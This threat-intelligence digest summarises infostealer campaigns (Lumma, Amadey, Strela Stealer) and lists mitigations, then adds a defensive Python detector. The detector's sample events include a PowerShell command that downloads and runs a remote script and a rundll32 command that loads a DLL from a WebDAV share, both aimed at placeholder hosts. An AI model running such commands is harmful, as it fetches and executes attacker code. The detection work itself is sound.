One Article Review

Source RiskIQ
Identifier 8603374
Publication date 2024-10-29 16:30:09 (viewed: 2024-10-29 17:07:18)
Title Lumma/Amadey: fake CAPTCHAs want to know if you're human (Recycled)
Text
## Snapshot
Cybercriminals continue to use [fake CAPTCHAs](https://security.microsoft.com/intel-explorer/articles/9c8e0b72) as an initial infection vector to distribute malware. [Lumma Stealer](https://security.microsoft.com/intel-profiles/3393357882548511C30B0728DDD3C4F8B5CA20E41C285A56F796EB39F57531ad) has been distributed this way through betting platforms, anime resources and web applications. Security researchers have also discovered CAPTCHAs delivering the Amadey Trojan.
## Description
The malicious CAPTCHA is part of an advertising network that has real offers in addition to the redirects leading to pages with the fake CAPTCHA. The CAPTCHA tricks users into executing a base64-encoded PowerShell command, which leads to an obfuscated PowerShell script that downloads the malicious payload. Lumma Stealer operates by using the legitimate tool BitLockerToGo.exe to manipulate the registry and search for files associated with cryptocurrency wallets, browser extensions, cookies and password manager archives in order to steal data. The Trojan attempts to use the tool to send the stolen data to the attacker's server. It then visits various online stores, possibly to boost views and generate revenue for its operators. Additionally, the campaign distributes the Amadey Trojan, which steals credentials from web browsers and various Virtual Network Computing (VNC) systems, substitutes crypto wallet addresses in the clipboard and, in some cases, takes screenshots and downloads the Remcos remote access tool to access the victim's device.

Securelist reports that from September 22 to October 14, 2024, more than 140,000 users encountered ads related to this campaign, and more than 20,000 of them were redirected to infected sites. The most affected users were in Brazil, Spain, Italy and Russia.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites and sites that host malware.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover the tools and techniques of att
Rating ★★
Sent Yes
Tags Ransomware, Spam, Malware, Tool, Threat


Reposts of the article (1):
Source RiskIQ
Identifier 8603011
Publication date 2024-10-28 21:32:18 (viewed: 2024-10-28 22:07:21)
Title Katz and Mouse Game: MaaS Infostealers Adapt to Patched Chrome Defenses
Text
## Snapshot
Elastic Security Labs has identified several techniques used by different malware families to circumvent Google Chrome's app-bound encryption feature, which was implemented to protect cookies stored in Chrome on Windows.
## Description
Infostealers have written new code to bypass this protection in order to stay competitive in the market and deliver capabilities that reliably retrieve cookie data from Chrome browsers. The techniques used by the infostealer families include integrating the offensive security tool ChromeKatz, leveraging COM to interact with Chrome services and decrypt the app-bound encryption key, and using Chrome's remote debugging feature. Infostealers including Stealc, MetaStealer, Phemedrone, XenoStealer and [Lumma](https://security.microsoft.com/intel-profiles/33933578825488511C30B0728D3C4F8B5CA20E41C285A) bypass Google's recent cookie protection feature that uses app-bound encryption.

Stealc and Vidar settled on the same implementation, which involves spawning a child process using a PE file embedded in the binary's data section to extract unencrypted cookie values residing in one of Chrome's child processes. MetaStealer uses a technique similar to the one demonstrated in a gist shared on X on September 27th, which may have served as inspiration for the malware authors. Phemedrone uses a combination of helper functions to extract the cookies, while XenoStealer launches an instance of chrome[.]exe and then injects code using a helper class called SharpInjector, passing the encrypted key as a parameter. Lumma uses pattern scanning to target Chrome's CookieMonster component in order to identify and dump cookies in clear text from the Chrome process.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 to [recheck links on click](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-links-about?ocid=magicti_ta_learndoc) and [delete sent mail](https://learn.microsoft.com/microsoft-365/security/office-365-security/zero-hour-auto-purge?ocid=magicti_ta_learndoc) in response to newly acquired threat intelligence. Turn on [safe attachments policies](https://learn.microsoft.com/microsoft-365/security/office-365-security/safe-attachments-policies-configure?ocid=magicti_ta_learndoc) to check attachments to inbound email.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/web-overview?ocid=magicti_ta_learndoc), which identifies and blocks malicious websites, including phishing sites, scam sites and sites that host malware. Turn on [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?ocid=magicti_ta_learndoc) to block connections to malicious domains and IP addresses.
- Check your perimeter firewall
Rating ★★★
Sent Yes
Tags Ransomware, Spam, Malware, Tool, Threat


The article resembles 1 other article(s):
Source RiskIQ
Date (GMT) 2024-10-30 22:28:21
Title (Déjà vu) Strela Stealer targets Central and Southwestern Europe through Stealthy Execution via WebDAV
Text
#### Targeted Geolocations
- Spain
- Germany
## Snapshot
The latest Strela Stealer phishing campaign, identified by Cyble Research and Intelligence Labs, uses deceptive invoices to lure victims, mainly impacting Central and Southwestern Europe.
## Description
These phishing emails contain ZIP files with obfuscated JavaScript files that, when opened, trigger a PowerShell command to download a malicious payload directly from a WebDAV (Web Distributed Authoring and Versioning) server. This method allows Strela Stealer to bypass detection by not saving files to disk. The malware's payload is embedded within a DLL file designed to extract email credentials and other sensitive details, specifically from Microsoft Outlook and Mozilla Thunderbird, which are then transmitted to the attackers' command server. Strela Stealer tailors its activity to specific geographic areas, in this campaign mainly Germany and Spain, by checking locale settings on the infected system. Additionally, it collects system details and file directory data, which allows attackers to perform reconnaissance and possibly conduct follow-up attacks. The malware uses sophisticated evasion techniques, such as JavaScript obfuscation and base64 encoding, making it challenging for security tools to detect. Strela Stealer's evolution, from simple phishing with ISO attachments to complex fileless execution, highlights the ongoing advancements in malware distribution tactics, emphasizing the need for robust cybersecurity measures to address such sophisticated threats.
## Microsoft Analysis and Additional OSINT Context
Threat actors use WebDAV for distributing information-stealing malware, such as Strela Stealer, because it offers several advantages for evasion, simplicity, and control over payload delivery:
- Fileless Execution and Evasion: WebDAV enables fileless malware execution by running malicious payloads directly from remote servers without saving them locally on the target machine. This helps bypass many traditional security defenses that focus on scanning files on disk, as no local file is created.
- Direct Remote Access: WebDAV is designed to allow clients to interact with remote servers as though they were local folders. This allows threat actors to distribute payloads seamlessly over HTTP/HTTPS, appearing as legitimate remote connections to the system, which reduces the chances of detection.
- Efficient Data Transmission: WebDAV supports real-time access to resources over the network, making it efficient for both distribution and control. Attackers can change payloads or update malicious DLLs on their WebDAV server, ensuring that new or adapted versions of malware are available without having to reinfect machines.
- Bypassing Firewalls and Security Filters: Many organizations allow outbound WebDAV traffic through HTTP or HTTPS. This allows attackers to communicate with compromised devices without raising alarms, as this traffic blends in with normal web traffic.
- Modular and Scalable Attacks: By using WebDAV, threat actors can scale their operations, as they only need to update files on a centralized server to infect multiple systems, enhancing the malware's reach with minimal adjustments on the attacker's side.

These qualities make WebDAV an attractive option for attackers seeking stealthy, flexible, and scalable methods to deliver information-stealing malware.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Check your Office 365 email filtering settings to ensure you block spoofed emails, spam, and emails with malware. Use [Microsoft Defender for Office 365](https://learn.microsoft.com/microsoft-365/security/office-365-security/defender-for-office-365?ocid=magicti_ta_learndoc) for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Microsoft Defender for Office 365 t
Tags Ransomware, Spam, Malware, Tool, Threat
Rating ★★
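As an added, defender-side example (not code from RiskIQ, Microsoft, Elastic or Cyble), the following Python flags the two execution patterns described on this page: the base64-encoded PowerShell command that the fake CAPTCHA tricks users into running (Lumma/Amadey article) and a PowerShell command that loads its payload straight from a WebDAV share (Strela Stealer article). The event shape, command lines and TEST-NET IP addresses are constructed sample data, and treating an explorer.exe parent as the Run-dialog paste pattern is this example's own assumption.

```python
import base64
import re
from typing import Optional


def encode_ps(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events in a Sysmon/EDR-like shape; not real telemetry.
SAMPLE_EVENTS = [
    {   # fake-CAPTCHA flow: the user pastes an encoded command, explorer.exe spawns PowerShell
        "parent": "explorer.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -w hidden -ep bypass -EncodedCommand "
        + encode_ps("iex (iwr 'http://203.0.113.10/verify.ps1' -UseBasicParsing)"),
    },
    {   # Strela-style flow: a script host runs PowerShell that loads a DLL straight off WebDAV
        "parent": "wscript.exe", "image": "powershell.exe",
        "cmdline": r'powershell.exe -NoP -c "& rundll32 \\203.0.113.20@SSL\DavWWWRoot\inv.dll,Start"',
    },
    {   # benign: an admin script that also uses -EncodedCommand
        "parent": "cmd.exe", "image": "powershell.exe",
        "cmdline": "powershell.exe -EncodedCommand "
        + encode_ps("Get-Service | Where-Object Status -eq 'Running'"),
    },
]

ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
# UNC form used by the Windows WebDAV mini-redirector: \\host@SSL\DavWWWRoot\... or \\host@80\DavWWWRoot\...
WEBDAV_PATH = re.compile(r"\\\\[\w.-]+(?:@ssl)?(?:@\d+)?\\davwwwroot\\", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyze_event(ev: dict) -> list:
    """Apply the three rules to one event and return the names of the rules that fired."""
    findings = []
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is not None and DOWNLOAD_CRADLE.search(decoded):
        findings.append("encoded PowerShell contains a download cradle")
    # assumption: a command pasted into the Run dialog shows up with explorer.exe as parent
    if decoded is not None and ev["parent"].lower() == "explorer.exe":
        findings.append("encoded PowerShell spawned by explorer.exe (Run-dialog paste pattern)")
    if WEBDAV_PATH.search(ev["cmdline"]) or (decoded is not None and WEBDAV_PATH.search(decoded)):
        findings.append("payload loaded from a WebDAV UNC path")
    return findings


def scan_events(events: list) -> list:
    """Return (event index, findings) for every event that fired at least one rule."""
    scored = [(i, analyze_event(ev)) for i, ev in enumerate(events)]
    return [(i, f) for i, f in scored if f]
```

To run this over real data, map the parent-process and command-line fields of Sysmon Event ID 1 or your EDR's process-creation records into the same dict shape and pass them to `scan_events`.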